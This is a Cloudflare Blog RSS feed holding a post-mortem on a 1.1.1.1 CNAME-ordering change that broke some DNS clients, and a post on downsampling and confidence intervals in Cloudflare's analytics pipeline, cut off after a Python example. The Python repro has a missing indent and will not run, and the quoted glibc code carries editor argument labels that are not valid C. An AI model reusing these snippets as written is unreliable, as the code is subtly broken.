
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
    <channel>
        <title><![CDATA[ The Cloudflare Blog ]]></title>
        <description><![CDATA[ Get the latest news on how products at Cloudflare are built, technologies used, and join the teams helping to build a better Internet. ]]></description>
        <link>https://blog.cloudflare.com</link>
        <atom:link href="https://blog.cloudflare.com/" rel="self" type="application/rss+xml"/>
        <language>en-us</language>
        <image>
            <url>https://blog.cloudflare.com/favicon.png</url>
            <title>The Cloudflare Blog</title>
            <link>https://blog.cloudflare.com</link>
        </image>
        <lastBuildDate>Wed, 15 Apr 2026 00:04:03 GMT</lastBuildDate>
        <item>
            <title><![CDATA[What came first: the CNAME or the A record?]]></title>
            <link>https://blog.cloudflare.com/cname-a-record-order-dns-standards/</link>
            <pubDate>Wed, 14 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[ A recent change to 1.1.1.1 accidentally altered the order of CNAME records in DNS responses, breaking resolution for some clients. This post explores the technical root cause, examines the source code of affected resolvers, and dives into the inherent ambiguities of the DNS RFCs.   ]]></description>
            <content:encoded><![CDATA[ <p>On January 8, 2026, a routine update to 1.1.1.1 aimed at reducing memory usage accidentally triggered a wave of DNS resolution failures for users across the Internet. The root cause wasn't an attack or an outage, but a subtle shift in the order of records within our DNS responses.  </p><p>While most modern software treats the order of records in DNS responses as irrelevant, we discovered that some implementations expect CNAME records to appear before everything else. When that order changed, resolution started failing. This post explores the code change that caused the shift, why it broke specific DNS clients, and the 40-year-old protocol ambiguity that makes the "correct" order of a DNS response difficult to define.</p>
    <div>
      <h2>Timeline</h2>
      <a href="#timeline">
        
      </a>
    </div>
    <p><i>All timestamps referenced are in Coordinated Universal Time (UTC).</i></p><table><tr><th><p><b>Time</b></p></th><th><p><b>Description</b></p></th></tr><tr><td><p>2025-12-02</p></td><td><p>The record reordering is introduced to the 1.1.1.1 codebase</p></td></tr><tr><td><p>2025-12-10</p></td><td><p>The change is released to our testing environment</p></td></tr><tr><td><p>2026-01-07 23:48</p></td><td><p>A global release containing the change starts</p></td></tr><tr><td><p>2026-01-08 17:40</p></td><td><p>The release reaches 90% of servers</p></td></tr><tr><td><p>2026-01-08 18:19</p></td><td><p>Incident is declared</p></td></tr><tr><td><p>2026-01-08 18:27</p></td><td><p>The release is reverted</p></td></tr><tr><td><p>2026-01-08 19:55</p></td><td><p>Revert is completed. Impact ends</p></td></tr></table>
    <div>
      <h2>What happened?</h2>
      <a href="#what-happened">
        
      </a>
    </div>
    <p>While making some improvements to lower the memory usage of our cache implementation, we introduced a subtle change to CNAME record ordering. The change was introduced on December 2, 2025, released to our testing environment on December 10, and began deployment on January 7, 2026.</p>
    <div>
      <h3>How DNS CNAME chains work</h3>
      <a href="#how-dns-cname-chains-work">
        
      </a>
    </div>
    <p>When you query for a domain like <code>www.example.com</code>, you might get a <a href="https://www.cloudflare.com/learning/dns/dns-records/dns-cname-record/"><u>CNAME (Canonical Name)</u></a> record that indicates one name is an alias for another name. It’s the job of public resolvers, such as <a href="https://www.cloudflare.com/learning/dns/what-is-1.1.1.1/"><u>1.1.1.1</u></a>, to follow this chain of aliases until it reaches a final response:</p><p><code>www.example.com → cdn.example.com → server.cdn-provider.com → 198.51.100.1</code></p><p>As 1.1.1.1 traverses this chain, it caches every intermediate record. Each record in the chain has its own <a href="https://www.cloudflare.com/learning/cdn/glossary/time-to-live-ttl/"><u>TTL (Time-To-Live)</u></a>, indicating how long we can cache it. Not all the TTLs in a CNAME chain need to be the same:</p><p><code>www.example.com → cdn.example.com (TTL: 3600 seconds) # Still cached
cdn.example.com → 198.51.100.1    (TTL: 300 seconds)  # Expired</code></p><p>When one or more records in a CNAME chain expire, it’s considered partially expired. Fortunately, since parts of the chain are still in our cache, we don’t have to resolve the entire CNAME chain again — only the part that has expired. In our example above, we would take the still valid <code>www.example.com → cdn.example.com</code> chain, and only resolve the expired <code>cdn.example.com</code> <a href="https://www.cloudflare.com/learning/dns/dns-records/dns-a-record/"><u>A record</u></a>. Once that’s done, we combine the existing CNAME chain and the newly resolved records into a single response.</p>
    <div>
      <h3>The logic change</h3>
      <a href="#the-logic-change">
        
      </a>
    </div>
    <p>The code that merges these two chains is where the change occurred. Previously, the code would create a new list, insert the existing CNAME chain, and then append the new records:</p>
            <pre><code>impl PartialChain {
    /// Merges records to the cache entry to make the cached records complete.
    pub fn fill_cache(&amp;self, entry: &amp;mut CacheEntry) {
        let mut answer_rrs = Vec::with_capacity(entry.answer.len() + self.records.len());
        answer_rrs.extend_from_slice(&amp;self.records); // CNAMEs first
        answer_rrs.extend_from_slice(&amp;entry.answer); // Then A/AAAA records
        entry.answer = answer_rrs;
    }
}
</code></pre>
            <p>However, to save some memory allocations and copies, the code was changed to instead append the CNAMEs to the existing answer list:</p>
            <pre><code>impl PartialChain {
    /// Merges records to the cache entry to make the cached records complete.
    pub fn fill_cache(&amp;self, entry: &amp;mut CacheEntry) {
        entry.answer.extend(self.records); // CNAMEs last
    }
}
</code></pre>
            <p>As a result, the responses that 1.1.1.1 returned now sometimes had the CNAME records appearing at the bottom, after the final resolved answer.</p>
    <div>
      <h3>Why this caused impact</h3>
      <a href="#why-this-caused-impact">
        
      </a>
    </div>
    <p>When DNS clients receive a response with a CNAME chain in the answer section, they also need to follow this chain to find out that <code>www.example.com</code> points to <code>198.51.100.1</code>. Some DNS client implementations handle this by keeping track of the expected name for the records as they’re iterated sequentially. When a CNAME is encountered, the expected name is updated:</p>
            <pre><code>;; QUESTION SECTION:
;; www.example.com.        IN    A

;; ANSWER SECTION:
www.example.com.    3600   IN    CNAME  cdn.example.com.
cdn.example.com.    300    IN    A      198.51.100.1
</code></pre>
            <p></p><ol><li><p>Find records for <code>www.example.com</code></p></li><li><p>Encounter <code>www.example.com. CNAME cdn.example.com</code></p></li><li><p>Find records for <code>cdn.example.com</code></p></li><li><p>Encounter <code>cdn.example.com. A 198.51.100.1</code></p></li></ol><p>When the CNAME suddenly appears at the bottom, this no longer works:</p>
            <pre><code>;; QUESTION SECTION:
;; www.example.com.	       IN    A

;; ANSWER SECTION:
cdn.example.com.    300    IN    A      198.51.100.1
www.example.com.    3600   IN    CNAME  cdn.example.com.
</code></pre>
            <p></p><ol><li><p>Find records for <code>www.example.com</code></p></li><li><p>Ignore <code>cdn.example.com. A 198.51.100.1</code> as it doesn’t match the expected name</p></li><li><p>Encounter <code>www.example.com. CNAME cdn.example.com</code></p></li><li><p>Find records for <code>cdn.example.com</code></p></li><li><p>No more records are present, so the response is considered empty</p></li></ol><p>One such implementation that broke is the <a href="https://man7.org/linux/man-pages/man3/getaddrinfo.3.html"><code><u>getaddrinfo</u></code></a> function in glibc, which is commonly used on Linux for DNS resolution. When looking at its <code>getanswer_r</code> implementation, we can indeed see it expects to find the CNAME records before any answers:</p>
            <pre><code>for (; ancount &gt; 0; --ancount)
  {
    // ... parsing DNS records ...
    
    if (rr.rtype == T_CNAME)
      {
        /* Record the CNAME target as the new expected name. */
        int n = __ns_name_unpack (c.begin, c.end, rr.rdata,
                                  name_buffer, sizeof (name_buffer));
        expected_name = name_buffer;  // Update what we're looking for
      }
    else if (rr.rtype == qtype
             &amp;&amp; __ns_samebinaryname (rr.rname, expected_name)  // Must match!
             &amp;&amp; rr.rdlength == rrtype_to_rdata_length (type:qtype))
      {
        /* Address record matches - store it */
        ptrlist_add (list:addresses, item:(char *) alloc_buffer_next (abuf, uint32_t));
        alloc_buffer_copy_bytes (buf:abuf, src:rr.rdata, size:rr.rdlength);
      }
  }
</code></pre>
            <p>Another notable affected implementation was the DNSC process in three models of Cisco ethernet switches. In the case where switches had been configured to use 1.1.1.1 these switches experienced spontaneous reboot loops when they received a response containing the reordered CNAMEs. <a href="https://www.cisco.com/c/en/us/support/docs/smb/switches/Catalyst-switches/kmgmt3846-cbs-reboot-with-fatal-error-from-dnsc-process.html"><u>Cisco has published a service document describing the issue</u></a>.</p>
    <div>
      <h3>Not all implementations break</h3>
      <a href="#not-all-implementations-break">
        
      </a>
    </div>
    <p>Most DNS clients don’t have this issue. For example, <a href="https://www.freedesktop.org/software/systemd/man/latest/systemd-resolved.service.html"><u>systemd-resolved</u></a> first parses the records into an ordered set:</p>
            <pre><code>typedef struct DnsAnswerItem {
        DnsResourceRecord *rr; // The actual record
        DnsAnswerFlags flags;  // Which section it came from
        // ... other metadata
} DnsAnswerItem;


typedef struct DnsAnswer {
        unsigned n_ref;
        OrderedSet *items;
} DnsAnswer;
</code></pre>
            <p>When following a CNAME chain it can then search the entire answer set, even if the CNAME records don’t appear at the top.</p>
    <div>
      <h2>What the RFC says</h2>
      <a href="#what-the-rfc-says">
        
      </a>
    </div>
    <p><a href="https://datatracker.ietf.org/doc/html/rfc1034"><u>RFC 1034</u></a>, published in 1987, defines much of the behavior of the DNS protocol, and should give us an answer on whether the order of CNAME records matters. <a href="https://datatracker.ietf.org/doc/html/rfc1034#section-4.3.1"><u>Section 4.3.1</u></a> contains the following text:</p><blockquote><p>If recursive service is requested and available, the recursive response to a query will be one of the following:</p><p>- The answer to the query, possibly preface by one or more CNAME RRs that specify aliases encountered on the way to an answer.</p></blockquote><p>While "possibly preface" can be interpreted as a requirement for CNAME records to appear before everything else, it does not use normative key words, such as <a href="https://datatracker.ietf.org/doc/html/rfc2119"><u>MUST and SHOULD</u></a> that modern RFCs use to express requirements. This isn’t a flaw in RFC 1034, but simply a result of its age. <a href="https://datatracker.ietf.org/doc/html/rfc2119"><u>RFC 2119</u></a>, which standardized these key words, was published in 1997, 10 years <i>after</i> RFC 1034.</p><p>In our case, we did originally implement the specification so that CNAMEs appear first. However, we did not have any tests asserting the behavior remains consistent due to the ambiguous language in the RFC.</p>
    <div>
      <h3>The subtle distinction: RRsets vs RRs in message sections</h3>
      <a href="#the-subtle-distinction-rrsets-vs-rrs-in-message-sections">
        
      </a>
    </div>
    <p>To understand why this ambiguity exists, we need to understand a subtle but important distinction in DNS terminology.</p><p>RFC 1034 <a href="https://datatracker.ietf.org/doc/html/rfc1034#section-3.6"><u>section 3.6</u></a> defines Resource Record Sets (RRsets) as collections of records with the same name, type, and class. For RRsets, the specification is clear about ordering:</p><blockquote><p>The order of RRs in a set is not significant, and need not be preserved by name servers, resolvers, or other parts of the DNS.</p></blockquote><p>However, RFC 1034 doesn’t clearly specify how message sections relate to RRsets. While modern DNS specifications have shown that message sections can indeed contain multiple RRsets (consider <a href="https://www.cloudflare.com/learning/dns/dnssec/how-dnssec-works/">DNSSEC</a> responses with signatures), RFC 1034 doesn’t describe message sections in those terms. Instead, it treats message sections as containing individual Resource Records (RRs).</p><p>The problem is that the RFC primarily discusses ordering in the context of RRsets but doesn't specify the ordering of different RRsets relative to each other within a message section. This is where the ambiguity lives.</p><p>RFC 1034 <a href="https://datatracker.ietf.org/doc/html/rfc1034#section-6.2.1"><u>section 6.2.1</u></a> includes an example that demonstrates this ambiguity further. It mentions that the order of Resource Records (RRs) is not significant either:</p><blockquote><p>The difference in ordering of the RRs in the answer section is not significant.</p></blockquote><p>However, this example only shows two A records for the same name within the same RRset. It doesn't address whether this applies to different record types like CNAMEs and A records.</p>
    <div>
      <h2>CNAME chain ordering</h2>
      <a href="#cname-chain-ordering">
        
      </a>
    </div>
    <p>It turns out that this issue extends beyond putting CNAME records before other record types. Even when CNAMEs appear before other records, sequential parsing can still break if the CNAME chain itself is out of order. Consider the following response:</p>
            <pre><code>;; QUESTION SECTION:
;; www.example.com.              IN    A

;; ANSWER SECTION:
cdn.example.com.           3600  IN    CNAME  server.cdn-provider.com.
www.example.com.           3600  IN    CNAME  cdn.example.com.
server.cdn-provider.com.   300   IN    A      198.51.100.1
</code></pre>
            <p>Each CNAME belongs to a different RRset, as they have different owners, so the statement about RRset order being insignificant doesn’t apply here.</p><p>However, RFC 1034 doesn't specify that CNAME chains must appear in any particular order. There's no requirement that <code>www.example.com. CNAME cdn.example.com.</code> must appear before <code>cdn.example.com. CNAME server.cdn-provider.com.</code>. With sequential parsing, the same issue occurs:</p><ol><li><p>Find records for <code>www.example.com</code></p></li><li><p>Ignore <code>cdn.example.com. CNAME server.cdn-provider.com</code>. as it doesn’t match the expected name</p></li><li><p>Encounter <code>www.example.com. CNAME cdn.example.com</code></p></li><li><p>Find records for <code>cdn.example.com</code></p></li><li><p>Ignore <code>server.cdn-provider.com. A 198.51.100.1</code> as it doesn’t match the expected name</p></li></ol>
    <div>
      <h2>What should resolvers do?</h2>
      <a href="#what-should-resolvers-do">
        
      </a>
    </div>
    <p>RFC 1034 section 5 describes resolver behavior. <a href="https://datatracker.ietf.org/doc/html/rfc1034#section-5.2.2"><u>Section 5.2.2</u></a> specifically addresses how resolvers should handle aliases (CNAMEs): </p><blockquote><p>In most cases a resolver simply restarts the query at the new name when it encounters a CNAME.</p></blockquote><p>This suggests that resolvers should restart the query upon finding a CNAME, regardless of where it appears in the response. However, it's important to distinguish between different types of resolvers:</p><ul><li><p>Recursive resolvers, like 1.1.1.1, are full DNS resolvers that perform recursive resolution by querying authoritative nameservers</p></li><li><p>Stub resolvers, like glibc’s getaddrinfo, are simplified local interfaces that forward queries to recursive resolvers and process the responses</p></li></ul><p>The RFC sections on resolver behavior were primarily written with full resolvers in mind, not the simplified stub resolvers that most applications actually use. Some stub resolvers evidently don’t implement certain parts of the spec, such as the CNAME-restart logic described in the RFC. </p>
    <div>
      <h2>The DNSSEC specifications provide contrast</h2>
      <a href="#the-dnssec-specifications-provide-contrast">
        
      </a>
    </div>
    <p>Later DNS specifications demonstrate a different approach to defining record ordering. <a href="https://datatracker.ietf.org/doc/html/rfc4035"><u>RFC 4035</u></a>, which defines protocol modifications for <a href="https://www.cloudflare.com/learning/dns/dnssec/how-dnssec-works/"><u>DNSSEC</u></a>, uses more explicit language:</p><blockquote><p>When placing a signed RRset in the Answer section, the name server MUST also place its RRSIG RRs in the Answer section. The RRSIG RRs have a higher priority for inclusion than any other RRsets that may have to be included.</p></blockquote><p>The specification uses "MUST" and explicitly defines "higher priority" for <a href="https://www.cloudflare.com/learning/dns/dnssec/how-dnssec-works/"><u>RRSIG</u></a> records. However, "higher priority for inclusion" refers to whether RRSIGs should be included in the response, not where they should appear. This provides unambiguous guidance to implementers about record inclusion in DNSSEC contexts, while not mandating any particular behavior around record ordering.</p><p>For unsigned zones, however, the ambiguity from RFC 1034 remains. The word "preface" has guided implementation behavior for nearly four decades, but it has never been formally specified as a requirement.</p>
    <div>
      <h2>Do CNAME records come first?</h2>
      <a href="#do-cname-records-come-first">
        
      </a>
    </div>
    <p>While in our interpretation the RFCs do not require CNAMEs to appear in any particular order, it’s clear that at least some widely-deployed DNS clients rely on it. As some systems using these clients might be updated infrequently, or never updated at all, we believe it’s best to require CNAME records to appear in-order before any other records.</p><p>Based on what we have learned during this incident, we have reverted the CNAME re-ordering and do not intend to change the order in the future.</p><p>To prevent any future incidents or confusion, we have written a proposal in the form of an <a href="https://www.ietf.org/participate/ids/"><u>Internet-Draft</u></a> to be discussed at the IETF. If consensus is reached on the clarified behavior, this would become an RFC that explicitly defines how to correctly handle CNAMEs in DNS responses, helping us and the wider DNS community navigate the protocol. The proposal can be found at <a href="https://datatracker.ietf.org/doc/draft-jabley-dnsop-ordered-answer-section/">https://datatracker.ietf.org/doc/draft-jabley-dnsop-ordered-answer-section</a>. If you have suggestions or feedback we would love to hear your opinions, most usefully via the <a href="https://datatracker.ietf.org/wg/dnsop/about/"><u>DNSOP working group</u></a> at the IETF.</p> ]]></content:encoded>
            <category><![CDATA[1.1.1.1]]></category>
            <category><![CDATA[Post Mortem]]></category>
            <category><![CDATA[DNS]]></category>
            <category><![CDATA[Resolver]]></category>
            <category><![CDATA[Standards]]></category>
            <category><![CDATA[Bugs]]></category>
            <category><![CDATA[Consumer Services]]></category>
            <guid isPermaLink="false">3fP84BsxwSxKr7ffpmVO6s</guid>
            <dc:creator>Sebastiaan Neuteboom</dc:creator>
        </item>
        <item>
            <title><![CDATA[Over 700 million events/second: How we make sense of too much data]]></title>
            <link>https://blog.cloudflare.com/how-we-make-sense-of-too-much-data/</link>
            <pubDate>Mon, 27 Jan 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ Here we explain how we made our data pipeline scale to 700 million events per second while becoming more resilient than ever before. We share some math behind our approach and some of the designs of  ]]></description>
            <content:encoded><![CDATA[ <p>Cloudflare's network provides an enormous array of services to our customers. We collect and deliver associated data to customers in the form of event logs and aggregated analytics. As of December 2024, our data pipeline is ingesting up to 706M events per second generated by Cloudflare's services, and that represents 100x growth since our <a href="https://blog.cloudflare.com/http-analytics-for-6m-requests-per-second-using-clickhouse/"><u>2018 data pipeline blog post</u></a>. </p><p>At peak, we are moving 107 <a href="https://simple.wikipedia.org/wiki/Gibibyte"><u>GiB</u></a>/s of compressed data, either pushing it directly to customers or subjecting it to additional queueing and batching.</p><p>All of these data streams power things like <a href="https://developers.cloudflare.com/logs/"><u>Logs</u></a>, <a href="https://developers.cloudflare.com/analytics/"><u>Analytics</u></a>, and billing, as well as other products, such as training machine learning models for bot detection. This blog post is focused on techniques we use to efficiently and accurately deal with the high volume of data we ingest for our Analytics products. A previous <a href="https://blog.cloudflare.com/cloudflare-incident-on-november-14-2024-resulting-in-lost-logs/"><u>blog post</u></a> provides a deeper dive into the data pipeline for Logs. </p><p>The pipeline can be roughly described by the following diagram.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5ihv6JXx19nJiEyfCaCg8V/ad7081720514bafd070cc38a04bc7097/BLOG-2486_2.jpg" />
          </figure><p>The data pipeline has multiple stages, and each can and will naturally break or slow down because of hardware failures or misconfiguration. And when that happens, there is just too much data to be able to buffer it all for very long. Eventually some will get dropped, causing gaps in analytics and a degraded product experience unless proper mitigations are in place.</p>
    <div>
      <h3>Dropping data to retain information</h3>
      <a href="#dropping-data-to-retain-information">
        
      </a>
    </div>
    <p>How does one retain valuable information from more than half a billion events per second, when some must be dropped? Drop it in a controlled way, by downsampling.</p><p>Here is a visual analogy showing the difference between uncontrolled data loss and downsampling. In both cases the same number of pixels were delivered. One is a higher resolution view of just a small portion of a popular painting, while the other shows the full painting, albeit blurry and highly pixelated.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4kUGB4RLQzFb7cphMpHqAg/e7ccf871c73e0e8ca9dcac32fe265f18/Screenshot_2025-01-24_at_10.57.17_AM.png" />
          </figure><p>As we noted above, any point in the pipeline can fail, so we want the ability to downsample at any point as needed. Some services proactively downsample data at the source before it even hits Logfwdr. This makes the information extracted from that data a little bit blurry, but much more useful than what otherwise would be delivered: random chunks of the original with gaps in between, or even nothing at all. The amount of "blur" is outside our control (we make our best effort to deliver full data), but there is a robust way to estimate it, as discussed in the <a href="/how-we-make-sense-of-too-much-data/#extracting-value-from-downsampled-data"><u>next section</u></a>.</p><p>Logfwdr can decide to downsample data sitting in the buffer when it overflows. Logfwdr handles many data streams at once, so we need to prioritize them by assigning each data stream a weight and then applying <a href="https://en.wikipedia.org/wiki/Max-min_fairness"><u>max-min fairness</u></a> to better utilize the buffer. It allows each data stream to store as much as it needs, as long as the whole buffer is not saturated. Once it is saturated, streams divide it fairly according to their weighted size.</p><p>In our implementation (Go), each data stream is driven by a goroutine, and they cooperate via channels. They consult a single tracker object every time they allocate and deallocate memory. The tracker uses a <a href="https://en.wikipedia.org/wiki/Heap_(data_structure)"><u>max-heap</u></a> to always know who the heaviest participant is and what the total usage is. Whenever the total usage goes over the limit, the tracker repeatedly sends the "please shed some load" signal to the heaviest participant, until the usage is again under the limit.</p><p>The effect of this is that healthy streams, which buffer a tiny amount, allocate whatever they need without losses. But any lagging streams split the remaining memory allowance fairly.</p><p>We downsample more or less uniformly, by always taking some of the least downsampled batches from the buffer (using min-heap to find those) and merging them together upon downsampling.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/15VP0VYkrvkQboX9hrOy0q/e3d087fe704bd1b0ee41eb5b7a24b899/BLOG-2486_4.png" />
          </figure><p><sup><i>Merging keeps the batches roughly the same size and their number under control.</i></sup></p><p>Downsampling is cheap, but since data in the buffer is compressed, it causes recompression, which is the single most expensive thing we do to the data. But using extra CPU time is the last thing you want to do when the system is under heavy load! We compensate for the recompression costs by starting to downsample the fresh data as well (before it gets compressed for the first time) whenever the stream is in the "shed the load" state.</p><p>We called this approach "bottomless buffers", because you can squeeze effectively infinite amounts of data in there, and it will just automatically be thinned out. Bottomless buffers resemble <a href="https://en.wikipedia.org/wiki/Reservoir_sampling"><u>reservoir sampling</u></a>, where the buffer is the reservoir and the population comes as the input stream. But there are some differences. First is that in our pipeline the input stream of data never ends, while reservoir sampling assumes it ends to finalize the sample. Secondly, the resulting sample also never ends.</p><p>Let's look at the next stage in the pipeline: Logreceiver. It sits in front of a distributed queue. The purpose of logreceiver is to partition each stream of data by a key that makes it easier for Logpush, Analytics inserters, or some other process to consume.</p><p>Logreceiver proactively performs adaptive sampling of analytics. This improves the accuracy of analytics for small customers (receiving on the order of 10 events per day), while more aggressively downsampling large customers (millions of events per second). Logreceiver then pushes the same data at multiple resolutions (100%, 10%, 1%, etc.) into different topics in the distributed queue. This allows it to keep pushing something rather than nothing when the queue is overloaded, by just skipping writing the high-resolution samples of data.</p><p>The same goes for Inserters: they can skip <i>reading or writing</i> high-resolution data. The Analytics APIs can skip <i>reading</i> high resolution data. The analytical database might be unable to read high resolution data because of overload or degraded cluster state or because there is just too much to read (very wide time range or very large customer). Adaptively dropping to lower resolutions allows the APIs to return <i>some</i> results in all of those cases.</p>
    <div>
      <h3>Extracting value from downsampled data</h3>
      <a href="#extracting-value-from-downsampled-data">
        
      </a>
    </div>
    <p>Okay, we have some downsampled data in the analytical database. It looks like the original data, but with some rows missing. How do we make sense of it? How do we know if the results can be trusted?</p><p>Let's look at the math.</p>Since the amount of sampling can vary over time and between nodes in the distributed system, we need to store this information along with the data. With each event $x_i$ we store its sample interval, which is the reciprocal to its inclusion probability $\pi_i = \frac{1}{\text{sample interval}}$. For example, if we sample 1 in every 1,000 events, each of the events included in the resulting sample will have its $\pi_i = 0.001$, so the sample interval will be 1,000. When we further downsample that batch of data, the inclusion probabilities (and the sample intervals) multiply together: a 1 in 1,000 sample from a 1 in 1,000 sample is a 1 in 1,000,000 sample of the original population. The sample interval of an event can also be interpreted roughly as the number of original events that this event represents, so in the literature it is known as weight $w_i = \frac{1}{\pi_i}$.
<p></p>
We rely on the <a href="https://en.wikipedia.org/wiki/Horvitz%E2%80%93Thompson_estimator">Horvitz-Thompson estimator</a> (HT, <a href="https://www.stat.cmu.edu/~brian/905-2008/papers/Horvitz-Thompson-1952-jasa.pdf">paper</a>) in order to derive analytics about $x_i$. It gives two estimates: the analytical estimate (e.g. the population total or size) and the estimate of the variance of that estimate. The latter enables us to figure out how accurate the results are by building <a href="https://en.wikipedia.org/wiki/Confidence_interval">confidence intervals</a>. They define ranges that cover the true value with a given probability <i>(confidence level)</i>. A typical confidence level is 0.95, at which a confidence interval (a, b) tells that you can be 95% sure the true SUM or COUNT is between a and b.
<p></p><p>So far, we know how to use the HT estimator for doing SUM, COUNT, and AVG.</p>Given a sample of size $n$, consisting of values $x_i$ and their inclusion probabilities $\pi_i$, the HT estimator for the population total (i.e. SUM) would be

$$\widehat{T}=\sum_{i=1}^n{\frac{x_i}{\pi_i}}=\sum_{i=1}^n{x_i w_i}.$$

The variance of $\widehat{T}$ is:

$$\widehat{V}(\widehat{T}) = \sum_{i=1}^n{x_i^2 \frac{1 - \pi_i}{\pi_i^2}} + \sum_{i \neq j}^n{x_i x_j \frac{\pi_{ij} - \pi_i \pi_j}{\pi_{ij} \pi_i \pi_j}},$$

where $\pi_{ij}$ is the probability of both $i$-th and $j$-th events being sampled together.
<p></p>
We use <a href="https://en.wikipedia.org/wiki/Poisson_sampling">Poisson sampling</a>, where each event is subjected to an independent <a href="https://en.wikipedia.org/wiki/Bernoulli_trial">Bernoulli trial</a> ("coin toss") which determines whether the event becomes part of the sample. Since each trial is independent, we can equate $\pi_{ij} = \pi_i \pi_j$, which when plugged in the variance estimator above turns the right-hand sum to zero:

$$\widehat{V}(\widehat{T}) = \sum_{i=1}^n{x_i^2 \frac{1 - \pi_i}{\pi_i^2}} + \sum_{i \neq j}^n{x_i x_j \frac{0}{\pi_{ij} \pi_i \pi_j}},$$

thus

$$\widehat{V}(\widehat{T}) = \sum_{i=1}^n{x_i^2 \frac{1 - \pi_i}{\pi_i^2}} = \sum_{i=1}^n{x_i^2 w_i (w_i-1)}.$$

For COUNT we use the same estimator, but plug in $x_i = 1$. This gives us:

$$\begin{align}
\widehat{C} &amp;= \sum_{i=1}^n{\frac{1}{\pi_i}} = \sum_{i=1}^n{w_i},\\
\widehat{V}(\widehat{C}) &amp;= \sum_{i=1}^n{\frac{1 - \pi_i}{\pi_i^2}} = \sum_{i=1}^n{w_i (w_i-1)}.
\end{align}$$

For AVG we would use

$$\begin{align}
\widehat{\mu} &amp;= \frac{\widehat{T}}{N},\\
\widehat{V}(\widehat{\mu}) &amp;= \frac{\widehat{V}(\widehat{T})}{N^2},
\end{align}$$

if we could, but the original population size $N$ is not known, it is not stored anywhere, and it is not even possible to store because of custom filtering at query time. Plugging $\widehat{C}$ instead of $N$ only partially works. It gives a valid estimator for the mean itself, but not for its variance, so the constructed confidence intervals are unusable.
<p></p>
In all cases the corresponding pair of estimates are used as the $\mu$ and $\sigma^2$ of the normal distribution (because of the <a href="https://en.wikipedia.org/wiki/Central_limit_theorem">central limit theorem</a>), and then the bounds for the confidence interval (of confidence level ) are:

$$\Big( \mu - \Phi^{-1}\big(\frac{1 + \alpha}{2}\big) \cdot \sigma, \quad \mu + \Phi^{-1}\big(\frac{1 + \alpha}{2}\big) \cdot \sigma\Big).$$<p>We do not know the N, but there is a workaround: simultaneous confidence intervals. Construct confidence intervals for SUM and COUNT independently, and then combine them into a confidence interval for AVG. This is known as the <a href="https://www.sciencedirect.com/topics/mathematics/bonferroni-method"><u>Bonferroni method</u></a>. It requires generating wider (half the "inconfidence") intervals for SUM and COUNT. Here is a simplified visual representation, but the actual estimator will have to take into account the possibility of the orange area going below zero.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/69Vvi2CHSW8Gew0TWHSndj/1489cfe1ff57df4e7e1ca3c31a8444a5/BLOG-2486_5.png" />
          </figure><p>In SQL, the estimators and confidence intervals look like this:</p>
            <pre><code>WITH sum(x * _sample_interval)                              AS t,
     sum(x * x * _sample_interval * (_sample_interval - 1)) AS vt,
     sum(_sample_interval)                                  AS c,
     sum(_sample_interval * (_sample_interval - 1))         AS vc,
     -- ClickHouse does not expose the erf⁻¹ function, so we precompute some magic numbers,
     -- (only for 95% confidence, will be different otherwise):
     --   1.959963984540054 = Φ⁻¹((1+0.950)/2) = √2 * erf⁻¹(0.950)
     --   2.241402727604945 = Φ⁻¹((1+0.975)/2) = √2 * erf⁻¹(0.975)
     1.959963984540054 * sqrt(vt) AS err950_t,
     1.959963984540054 * sqrt(vc) AS err950_c,
     2.241402727604945 * sqrt(vt) AS err975_t,
     2.241402727604945 * sqrt(vc) AS err975_c
SELECT t - err950_t AS lo_total,
       t            AS est_total,
       t + err950_t AS hi_total,
       c - err950_c AS lo_count,
       c            AS est_count,
       c + err950_c AS hi_count,
       (t - err975_t) / (c + err975_c) AS lo_average,
       t / c                           AS est_average,
       (t + err975_t) / (c - err975_c) AS hi_average
FROM ...</code></pre>
            <p>Construct a confidence interval for each timeslot on the timeseries, and you get a confidence band, clearly showing the accuracy of the analytics. The figure below shows an example of such a band in shading around the line.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4JEnnC6P4BhM8qB8J5yKqt/3635835967085f9b24f64a5731457ddc/BLOG-2486_6.png" />
          </figure>
    <div>
      <h3>Sampling is easy to screw up</h3>
      <a href="#sampling-is-easy-to-screw-up">
        
      </a>
    </div>
    <p>We started using confidence bands on our internal dashboards, and after a while noticed something scary: a systematic error! For one particular website the "total bytes served" estimate was higher than the true control value obtained from rollups, and the confidence bands were way off. See the figure below, where the true value (blue line) is outside the yellow confidence band at all times.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/CHCyKyXqPMj8DnMpBUf3N/772fb61f02b79c59417f66d9dc0b5d19/BLOG-2486_7.png" />
          </figure><p>We checked the stored data for corruption, it was fine. We checked the math in the queries, it was fine. It was only after reading through the source code for all of the systems responsible for sampling that we found a candidate for the root cause.</p><p>We used simple random sampling everywhere, basically "tossing a coin" for each event, but in Logreceiver sampling was done differently. Instead of sampling <i>randomly</i> it would perform <i>systematic sampling</i> by picking events at equal intervals starting from the first one in the batch.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4xUwjxdylG5ARlFlDtv1OC/76db68677b7ae072b0a065f59d82c6f2/BLOG-2486_8.png" />
          </figure><p>Why would that be a problem?</p>There are two reasons. The first is that we can no longer claim $\pi_{ij} = \pi_i \pi_j$, so the simplified variance estimator stops working and confidence intervals cannot be trusted. But even worse, the estimator for the total becomes biased. To understand why exactly, we wrote a short repro code in Python:
<br /><p></p>
            <pre><code>import itertools

def take_every(src, period):
    for i, x in enumerate(src):
    if i % period == 0:
        yield x

pattern = [10, 1, 1, 1, 1, 1]
sample_interval = 10 # bad if it has common factors with len(pattern)
true_mean = sum(pattern) / len(pattern)

orig = itertools.cycle(pattern)
sample_size = 10000
sample = itertools.islice(take_every(orig, sample_interval), sample_size)

sample_mean = sum(sample) / sample_size

print(f"{true_mean=} {sample_mean=}")</code></pre>
